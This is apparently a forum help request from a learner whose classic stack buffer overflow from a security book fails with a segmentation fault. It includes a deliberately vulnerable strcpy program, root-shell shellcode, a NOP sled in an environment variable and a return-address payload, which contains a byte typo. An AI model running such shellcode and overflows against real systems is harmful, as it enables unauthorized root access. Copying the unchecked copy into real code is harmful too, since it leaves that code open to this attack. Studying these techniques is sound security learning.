Stack Confusion with Buffer Overflow



Hello,

At the moment I am reading a book called "Forbidden Code". The book
contains examples, but they never work for me, although I'm sure that I
understood everything.
I want to describe the example. It is about getting root permissions on
one's own computer with the help of a buffer overflow.
First of all, there is the vulnerable program:

#include <string.h>

int main(int argc, char **argv) {
    char buffer[5];

    /* Unbounded copy: argv[1] is written into the 5-byte buffer
       without any length check. */
    strcpy(buffer, argv[1]);
    return 0;
}

Then I saved the shellcode, which I got from the book, to a variable
SHELLCODE. The shellcode looks like this:

\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88
\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c
\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

It is described that \x90 is the "No Operation" instruction. "shellcode"
contains 46 hex numbers, which also include /bin/sh, as you can see below:

export SHELLCODE=`perl -e 'print "\x90"x200;'``cat shellcode`

Then I looked into the stack:

0xbfd13510: "HOSTNAME=gentoo"
0xbfd13520: "SHELLCODE=", '\220' <repeats 190 times>...
0xbfd135e8: "\220\220\220\220\220\220\220\220\220\2201À°F1Û1ÉÍ\200ë\026[1À\210C\a\211[\b\211C\f°\v\215K\b\215S\fÍ\200èåÿÿÿ/bin/sh"
0xbfd13621: "SHELL=/bin/bash"

Because the address 0xbfd13520 contains the string "SHELLCODE", I have
to choose a later address to get to the code, so I chose at least
0xbfd13530.
Now I can use this address as the jump-back address for the buffer
overflow. I have to give the hex numbers in little-endian order
because my processor is an Intel. (By the way, I also tried a 100-times
loop below.)

../vuln `perl -e 'print "\x30\x35\xd1\bf"x10;'`

When I start vuln with the parameters, I just get a SEGMENTATION FAULT
instead of root rights.
At first I thought that the shellcode could be wrong, but in an earlier
example I managed to get root privileges, but _only_ once.
Can anybody imagine where this example fails?

Thanks,
Markus